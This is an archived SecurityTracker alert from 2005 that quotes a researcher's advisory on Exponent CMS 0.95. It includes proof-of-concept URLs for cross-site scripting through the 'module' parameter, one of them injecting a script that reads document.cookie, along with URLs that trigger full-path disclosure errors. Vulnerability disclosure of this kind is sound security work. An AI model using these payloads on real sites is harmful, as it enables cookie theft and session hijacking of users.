Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Exponent CMS Discloses Path to Remote Users and Permits Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1013020
|
|
SecurityTracker URL: http://securitytracker.com/id?1013020
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
|
OSVDB Reference: 13188
, 13189
, 13190
(Links to External Site)
|
|
Nessus Reference: 16250
(Links to External Site)
|
Date: Jan 28 2005
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 0.95
|
Description: Several vulnerabilities were reported in Exponent CMS. A remote user can determine the installation path. A remote user can also conduct cross-site scripting attacks.
y3dips reported that 'index.php' does not properly validate user-supplied input in the 'module' variable. A remote user can create
a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's
browser. The code will originate from the site running the Exponent CMS software and will run in the security context of that site.
As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with
the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the
target user.
A demonstration exploit URL is provided:
http://[target]/expo/index.php?action=view&id=2&module=<h1>Tes</h1>
The
'mod.php' script is also affected. A demonstration exploit URL is provided:
http://[target]/endon/mod.php?action=[BLABLA]&module=[XSS]
A
remote user can directly load certain scripts to cause the system to generate an error message that discloses the installation path.
http://[target]/expo/subsystems/se
arch.info.php
http://[target]/expo/subsystems/permissions.info.php
http://[target]/expo/subsystems/security.info.php
http://[target]/expo/sdk/blanks/formcontrol.
php
http://[target]/expo/sdk/blanks/file_modules.php
The original advisory is available at:
http://echo.or.id/adv/adv010-y3dips-2005.txt
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
Exponent CMS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
A remote user can determine the installation path.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.exponentcms.org/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Ahmad Muammar <y3dips@echo.or.id>
|
Message History:
None.
|
Source Message Contents
|
Date: 25 Jan 2005 08:35:51 -0000
From: Ahmad Muammar <y3dips@echo.or.id>
Subject: Vulnerabilities in eXponent 0.95
|
ECHO_ADV_02$2004
---------------------------------------------------------------------------
Vulnerabilities in eXponent
---------------------------------------------------------------------------
Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv010-y3dips-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exponent Content Management System
Exponent is an exciting new web-based content management system. It makes
creating and maintaining websites easy for non-technical users, while
providing site managers the power and flexibility to add new features,
completely customize the layout, and delegate responsibilities to other
users.
by: James Hunt and the OIC Group
http://www.exponentcms.org
Version :
- Stable version of 0.95 Exponent CMS.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Cross-site scripting aka XSS:
A1 - XSS through unsanitaized user submitted in module variable
http://[SITE]/expo/index.php?action=view&id=2&module=<h1>Tes</h1>
POC : http://[SITE]/expo/index.php?action=view&id=2&module=<h1>Tes</h1>
A2. Session ID at module Variable
http://[SITE]/endon/mod.php?action=[BLABLA]&module=[XSS]
POC :
http://[SITE]/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/scrip
t%3E
B. Full Path disclosures
Some scripts in subsystems directories are vulnerable against direct access
and we will see standard php error messages revealing full path to script
This vulnerable is because undeffined pathos_core_version variable ,
and the vulnerable files has the same format name (:)~)
---.info.---.php
POC : http://localhost/expo/subsystems/search.info.php
Fatal error: Call to undefined function: pathos_core_version() in
/var/www/html/expo/subsystems/search.info.php on line 52
POC :
http://localhost/expo/subsystems/permissions.info.php
POC :
http://localhost/expo/subsystems/security.info.php
Fatal error: Call to undefined function: pathos_core_version() in
/var/www/html/expo/subsystems/security.info.php on line 51
Fatal error: Call to undefined function: pathos_core_version() in
/var/www/html/expo/subsystems/permissions.info.php on line 51
Another vulnerable path
- http://localhost/expo/sdk/blanks/formcontrol.php
- http://localhost/expo/sdk/blanks/file_modules.php
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32)
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o@DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
|
|
Go to the Top of This SecurityTracker Archive Page
|
